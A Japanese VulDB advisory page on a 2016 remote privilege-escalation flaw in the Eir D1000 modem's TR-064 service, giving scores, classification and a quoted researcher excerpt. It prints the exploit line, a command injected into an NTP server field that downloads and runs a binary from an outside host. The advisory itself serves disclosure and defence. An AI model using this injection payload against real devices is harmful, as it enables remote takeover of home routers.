| CVSS 一時的なメタスコア | 現在のエクスプロイト価格 (≈) | CTI注目指数 |
|---|---|---|
| 9.6 | $0-$5k | 0.00 |
要約
このたび、Eir D1000 Modemにおいて、重大に分類される脆弱性が見つかりました。 影響を受けるのは 不明な関数 コンポーネントTR-069のです。 操作結果として 特権昇格につながります。 さらに、悪用手段が存在します。 ファイアウォールの制限的な運用を推奨します。
詳細
このたび、Eir D1000 Modemにおいて、重大に分類される脆弱性が見つかりました。 影響を受けるのは 不明な関数 コンポーネントTR-069のです。 操作結果として 特権昇格につながります。 CWEによる問題の宣言は、CWE-269 につながります。 この弱点は 2016年11月07日に発表されました 、kenzo2017によって 、Eir’s D1000 Modem Is Wide Open To Being Hacked.として 、勧告として (ウェブサイト)。 アドバイザリはdevicereversing.wordpress.comでダウンロードできます。 一般向けリリースはベンダーとの調整なしに行われました。
テクニカルな情報はありません。 この脆弱性の人気度は平均以上です。 さらに、悪用手段が存在します。 エクスプロイトが公開されており、使用される可能性があります。 現在の時点で、エクスプロイトの価格はおおよそUSD $0-$5kかもしれません。 MITRE ATT&CKプロジェクトによると、攻撃手法はT1068です。 勧告では次の点が指摘されています:
What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.
高度に機能的 に指定されています。 エクスプロイトツールは devicereversing.wordpress.com にダウンロードのために共有されています。 0-dayの場合、推定されるアンダーグラウンドでの価格は約$25k-$100kでした。 エクスプロイトに使用されたソースコード:
<NewNTPServer1> `cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1` </NewNTPServer1>
ファイアウォールの制限的な運用を推奨します。
影響あり
- Telekom Speedport Modem
製品
ベンダー
名前
CPE 2.3
CPE 2.2
CVSSv4
VulDB ベクトル: 🔍VulDB 信頼性: 🔍
CVSSv3
VulDB ベースメタスコア: 9.8VulDB 一時的なメタスコア: 9.6
VulDB ベーススコア: 9.8
VulDB 一時的なスコア: 9.6
VulDB ベクトル: 🔍
VulDB 信頼性: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| ベクトル | 複雑さ | 認証 | 機密性 | 完全性 | 可用性 |
|---|---|---|---|---|---|
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
| 解除 | 解除 | 解除 | 解除 | 解除 | 解除 |
VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍
悪用
クラス: 特権昇格CWE: CWE-269 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍
物理的: いいえ
ローカル: いいえ
リモート: はい
可用性: 🔍
アクセス: パブリック
ステータス: 高度に機能的
プログラミング言語: 🔍
ダウンロード: 🔍
価格予測: 🔍
現在の価格評価: 🔍
| 0-Day | 解除 | 解除 | 解除 | 解除 |
|---|---|---|---|---|
| 本日 | 解除 | 解除 | 解除 | 解除 |
脅威インテリジェンス
関心: 🔍アクティブアクター: 🔍
アクティブなAPTグループ: 🔍
対策
推奨: Firewallステータス: 🔍
0day日時: 🔍
エクスプロイト遅延時間: 🔍
Firewalling: 🔍
タイムライン
2016年11月07日 🔍2016年11月07日 🔍
2016年11月30日 🔍
2019年06月13日 🔍
ソース
勧告: Eir’s D1000 Modem Is Wide Open To Being Hacked.調査者: kenzo2017
ステータス: 確認済み
GCVE (VulDB): GCVE-100-93872
scip Labs: https://www.scip.ch/en/?labs.20161013
関連情報: 🔍
エントリ
作成済み: 2016年11月30日 12:05更新済み: 2019年06月13日 06:43
変更: 2016年11月30日 12:05 (52), 2019年06月13日 06:43 (1)
完了: 🔍
Cache ID: 216:B04:103
コメントはまだありません。 言語: ja + en.
コメントするにはログインしてください。